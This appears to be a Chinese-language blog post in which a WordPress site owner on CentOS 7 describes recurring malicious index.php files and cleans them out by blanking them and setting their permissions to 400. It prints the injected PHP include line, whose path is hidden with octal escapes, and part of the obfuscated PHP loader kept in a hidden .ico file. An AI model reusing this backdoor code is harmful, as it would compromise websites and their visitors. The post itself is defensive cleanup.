几个目录莫名出现index.php并且里面的文件为以下内容
<?php /*5155f*/ @include "\057da\164a/\167ww\162oo\164/w\145b/\167ww\056fu\156et\070.c\157m/\167p-\143on\164en\164/f\151le\163/.\0632e\06691\0609.\151co"; /*5155f*/
删掉文件过几天再次出现,应该是wordpress的漏洞导致的,不知道是插件的漏洞还是wordpress本身的漏洞。
删除文件会像小强一样再次出现,改变文件的文件的权限,找到被感染的文件,将文件的权限改成只读 400
我的服务器是centos7
进入wordpress的目录 目录:site echo ""> ./site/index.php echo ""> ./site/page.php chmod 400 -R ./site img里面是静态文件 # find ./img/ -name 'index.php' # cat ./img/tui15-01-12/index.php <?php /*5155f*/ @include "\057da\164a/\167ww\162oo\164/w\145b/\167ww\056fu\156et\070.c\157m/\167p-\143on\164en\164/f\151le\163/.\0632e\06691\0609.\151co"; /*5155f*/ # echo "hello world"> ./img/*/index.php -bash: ./img/*/index.php: ambiguous redirect
将文件空白 echo "" > ./img/10baofu/index.php echo "" > ./img/13apple/index.php echo "" > ./img/2014/index.php echo "" > ./img/2015ali-fj/index.php echo "" > ./img/2015nba-jiezhi/index.php echo "" > ./img/bf-low/index.php echo "" > ./img/caipiao/index.php echo "" > ./img/canren-gif/index.php echo "" > ./img/china-dxjc/index.php echo "" > ./img/china-viwe/index.php echo "" > ./img/chuangyetaolu/index.php echo "" > ./img/clonezilla-centos/index.php echo "" > ./img/code-yuyan/index.php echo "" > ./img/dakai-nao/index.php echo "" > ./img/deguo-read/index.php echo "" > ./img/egao-cxy/index.php echo "" > ./img/guanlan/index.php echo "" > ./img/HTTP_Status_Code/index.php echo "" > ./img/jaychow-zhuanji/index.php echo "" > ./img/jenkins/index.php echo "" > ./img/kubisbz/gpjifxbt.php echo "" > ./img/kubisbz/index.php echo "" > ./img/linux/index.php echo "" > ./img/nainai-dd/index.php echo "" > ./img/ndong-gif/index.php echo "" > ./img/qingzi-love/index.php echo "" > ./img/qq-ali-work/index.php echo "" > ./img/R720_system/index.php echo "" > ./img/tiaoyuepic/index.php echo "" > ./img/toulanzs/index.php echo "" > ./img/tui14-10-26b/index.php echo "" > ./img/tui15-01-12/index.php echo "" > ./img/tui15-04-12/index.php echo "" > ./img/vpn_windows/index.php echo "" > ./img/weixin_bps/index.php echo "" > ./img/xidada-gif/index.php echo "" > ./img/xiee-logo/index.php echo "" > ./img/yamaxun-gif/index.php echo "" > ./img/yunweioneday/index.php echo "" > ./img/zhexieci/index.php echo "" > ./img/zhuangbi-men/index.php 修改文件权限 chmod 400 ./img/10baofu/index.php chmod 400 ./img/13apple/index.php chmod 400 ./img/2014/index.php chmod 400 ./img/2015ali-fj/index.php chmod 400 ./img/2015nba-jiezhi/index.php chmod 400 ./img/bf-low/index.php chmod 400 ./img/caipiao/index.php chmod 400 ./img/canren-gif/index.php chmod 400 ./img/china-dxjc/index.php chmod 400 ./img/china-viwe/index.php chmod 400 ./img/chuangyetaolu/index.php chmod 400 ./img/clonezilla-centos/index.php chmod 400 ./img/code-yuyan/index.php chmod 400 ./img/dakai-nao/index.php chmod 400 ./img/deguo-read/index.php chmod 400 ./img/egao-cxy/index.php chmod 400 ./img/guanlan/index.php chmod 400 ./img/HTTP_Status_Code/index.php chmod 400 ./img/jaychow-zhuanji/index.php chmod 400 ./img/jenkins/index.php chmod 400 ./img/kubisbz/gpjifxbt.php chmod 400 ./img/kubisbz/index.php chmod 400 ./img/linux/index.php chmod 400 ./img/nainai-dd/index.php chmod 400 ./img/ndong-gif/index.php chmod 400 ./img/qingzi-love/index.php chmod 400 ./img/qq-ali-work/index.php chmod 400 ./img/R720_system/index.php chmod 400 ./img/tiaoyuepic/index.php chmod 400 ./img/toulanzs/index.php chmod 400 ./img/tui14-10-26b/index.php chmod 400 ./img/tui15-01-12/index.php chmod 400 ./img/tui15-04-12/index.php chmod 400 ./img/vpn_windows/index.php chmod 400 ./img/weixin_bps/index.php chmod 400 ./img/xidada-gif/index.php chmod 400 ./img/xiee-logo/index.php chmod 400 ./img/yamaxun-gif/index.php chmod 400 ./img/yunweioneday/index.php chmod 400 ./img/zhexieci/index.php chmod 400 ./img/zhuangbi-men/index.php
# find ./ -name ".*.ico" ./wp-content/files/.32e69109.ico cat ./wp-content/files/.32e69109.ico <?php $_no41yhg = basename/*m8k*/(/*z9c*/trim/*mc*/(/*s*/preg_replace/*50*/(/*x2f*/rawurldecode/*st2*/(/*qa7*/"%2F%5C%28.%2A%24%2F"/*458ix*/)/*x1lbe*/, '', __FILE__/*ac*/)/*bu*//*knaq2*/)/*di*//*u6*/)/*fd1uc*/;$_b4iwx = "GU%12M%17%5DTVP%40%0C%07G%09%40F%17SX%5CoZA%07%17%0AVGm%06D%5CPD%5C%0ENJF%24H8%01S_X%5E%5C%06N%10%1B%5CVS%08iZ%5E%5EMK%11%170MAW%04B%5C%11%17%15%0EXJT%24s%5B%0B_fBUM%06N%06%1D%5C%5C%40%3AZVV%17%15%0E%276%23b%1A%09%25_WXoJK%1DKHB%5CU%3ASKC_K%5DNOO%1E%1A%09%25_WXoJK%1DKHCRJ%3ASATSLZ%00%0C%01qG%5B%08S%1E%1D%10%09%07R%23%0A%5CA%5D%17iKT%40V%5C%1D%0A%01I%1B%02L%0DyBUMq%1D%0A%02Kl%5E%0C%5BPE%18%09%07R%0A%09%06%12V%00PP_U%5D%06K3%27~lw%2Az%1B%18%19BJ%0C%05%06%40V%1AGfqao%7Ca%25AC%0E%11n%0B%14%10%0AMPHIKNJVT%0CX%5CU%18%1EH%00%0F%0AqCG%11iZ%5E%5EMK%07%17%1C%0E%14%1BLM% .... # echo "">./wp-content/files/.32e69109.ico # chmod 400 ./wp-content/files/.32e69109.ico
